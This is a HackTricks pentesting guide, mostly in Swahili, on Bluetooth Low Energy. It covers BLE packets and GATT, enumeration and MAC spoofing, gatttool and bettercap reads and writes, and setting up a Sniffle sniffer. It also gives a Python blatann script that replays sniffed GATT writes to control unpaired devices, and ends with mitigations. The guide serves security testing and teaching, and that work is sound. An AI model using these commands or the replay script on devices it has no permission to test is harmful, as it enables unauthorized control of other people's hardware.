HackTricksPentesting BLE - Bluetooth Low Energy
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Utangulizi
Inapatikana tangu specification ya Bluetooth 4.0, BLE inatumia chaneli 40 tu, ikifunika safu ya 2400 hadi 2483.5 MHz. Kwa upande mwingine, Bluetooth ya jadi inatumia chaneli 79 katika safu hiyo hiyo.
Vifaa vya BLE huwasiliana kwa kutuma advertising packets (beacons); vifurushi hivi vinatangaza kuwepo kwa kifaa cha BLE kwa vifaa vingine vilivyo karibu. Beacons hizi pia wakati mwingine send data.
Kifaa kinachosikiliza, kinachoitwa pia central device, kinaweza kujibu advertising packet kwa SCAN request iliyotumwa maalum kwa kifaa kinacho-advertise. The response kwa scan hiyo inatumia muundo ule ule wa advertising packet pamoja na taarifa za ziada ambazo hazikuweza kufaa kwenye request ya mwanzo ya advertising, kama jina kamili la kifaa.
.png)
The preamble byte huoanisha frequency, whereas the four-byte access address ni connection identifier, inayotumika katika matukio ambapo vifaa vingi vinajaribu kuanzisha connections kwenye chaneli zile zile. Ifuatayo, Protocol Data Unit (PDU) ina advertising data. Kuna aina kadhaa za PDU; zinazotumika zaidi ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU ADV_NONCONN_IND ikiwa havipokei connections, vikituma data tu katika advertising packet. Vifaa vinatumia ADV_IND ikiwa vinaruhusu connections na stop sending advertising packets mara tu connection itakapokuwa established.
GATT
The Generic Attribute Profile (GATT) inaeleza jinsi kifaa kinavyopaswa kupanga na kusafirisha data. Unapoangalia attack surface ya kifaa cha BLE, mara nyingi utazingatia GATT (au GATTs), kwa sababu ndiyo njia ambapo device functionality gets triggered na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inaorodhesha characteristics, descriptors, na services za kifaa katika jedwali kwa thamani za 16- au 32-bits. A characteristic ni thamani ya data inayotumwa kati ya central device na peripheral. Characteristics hizi zinaweza kuwa na descriptors ambazo provide additional information about them. Characteristics mara nyingi grouped katika services ikiwa zinahusiana na kutekeleza kitendo fulani.
Orodhesho
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up
# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
GATTool
GATTool inaruhusu kuanzisha muunganisho na kifaa kingine, kuorodhesha sifa za kifaa hicho, na kusoma na kuandika tabia zake.
GATTTool inaweza kuzindua shell ya mwingiliano kwa chaguo la -I:
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]
# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)
# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16
# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
Bettercap
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported
# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
Sniffing and actively controlling unpaired BLE devices
Many low-cost BLE peripherals do not enforce pairing/bonding. Without bonding, the Link Layer encryption is never enabled, so ATT/GATT traffic is in cleartext. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.
Sniffing with Sniffle (CC26x2/CC1352)
Vifaa: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) iliyoflash upya na NCC Group’s Sniffle firmware.
Sakinisha Sniffle na Wireshark extcap yake kwenye Linux:
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
echo "[+] - Sniffle not installed! Installing at 1.10.0..."
sudo mkdir -p /opt/sniffle
sudo chown -R $USER:$USER /opt/sniffle
pushd /opt/sniffle
wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
tar xvf v1.10.0.tar.gz
# Install Wireshark extcap for user and root only
mkdir -p $HOME/.local/lib/wireshark/extcap
ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
sudo mkdir -p /root/.local/lib/wireshark/extcap
sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
popd
else
echo "[+] - Sniffle already installed at 1.10.0"
fi
Flash Sonoff na Sniffle firmware (hakikisha kifaa chako cha serial kinalingana, kwa mfano /dev/ttyUSB0):
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
Kamata katika Wireshark kupitia extcap ya Sniffle na badilisha kwa haraka kuelekea uandikaji unaobadilisha hali kwa kuchuja:
_ws.col.info contains "Sent Write Command"
Hii inaonyesha ATT Write Commands kutoka kwa client; handle na value mara nyingi huambatana moja kwa moja na vitendo vya kifaa (kwa mfano, write 0x01 kwenye buzzer/alert characteristic, 0x00 kuacha).
Mifano ya haraka ya Sniffle CLI:
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
Mbadala ya sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin pia inafanya kazi. Kwa Nordic dongles ndogo/ccinachoharibu kawaida unaandika juu USB bootloader ili kupakia sniffer firmware, hivyo au unaweka dongle maalum ya sniffer au unahitaji J-Link/JTAG kurejesha bootloader baadaye.
Udhibiti hai kupitia GATT
Mara tu unapobaini writable characteristic handle and value kutoka kwa sniffed traffic, unganisha kama central yoyote na tuma write ile ile:
-
Kwa kutumia Nordic nRF Connect for Desktop (BLE app):
-
Chagua nRF52/nRF52840 dongle, scan na uunganishe na target.
-
Pitia GATT database, tafuta target characteristic (mara nyingi ina friendly name, kwa mfano, Alert Level).
-
Fanya Write na sniffed bytes (kwa mfano, 01 kuanzisha, 00 kusitisha).
-
Endesha otomatiki kwenye Windows na Nordic dongle ukitumia Python + blatann:
import time
import blatann
# CONFIG
COM_PORT = "COM29" # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00" # Replace with your target MAC
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")
# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
print("[!] Connection failed.")
ble_device.close()
raise SystemExit(1)
print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)
# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
for ch in service.characteristics:
if ch.handle == 0x000b: # Replace with your handle
print("[!] Beeping.")
ch.write(b"\x01")
time.sleep(2)
print("[+] And relax.")
ch.write(b"\x00")
print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
Vidokezo vya uendeshaji na mbinu za kupunguza hatari
- Pendelea Sonoff+Sniffle kwenye Linux kwa channel hopping na connection following imara. Weka Nordic sniffer ya ziada kama chelezo.
- Bila pairing/bonding, mshambuliaji yeyote aliye karibu anaweza kuona writes na replay/craft zao kwa unauthenticated writable characteristics.
- Mbinu za kupunguza: hitaji pairing/bonding na ulazimishe encryption; weka ruhusa za characteristic ili zitake authenticated writes; punguza unauthenticated writable characteristics kadri uwezavyo; thibitisha GATT ACLs kwa Sniffle/nRF Connect.
Marejeo
- Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners
- Sniffle – A sniffer for Bluetooth 5 and 4.x LE
- Firmware installation for Sonoff USB Dongle (Sniffle README)
- Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)
- Nordic nRF Sniffer for Bluetooth LE
- nRF Connect for Desktop
- blatann – Python BLE library for Nordic devices
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.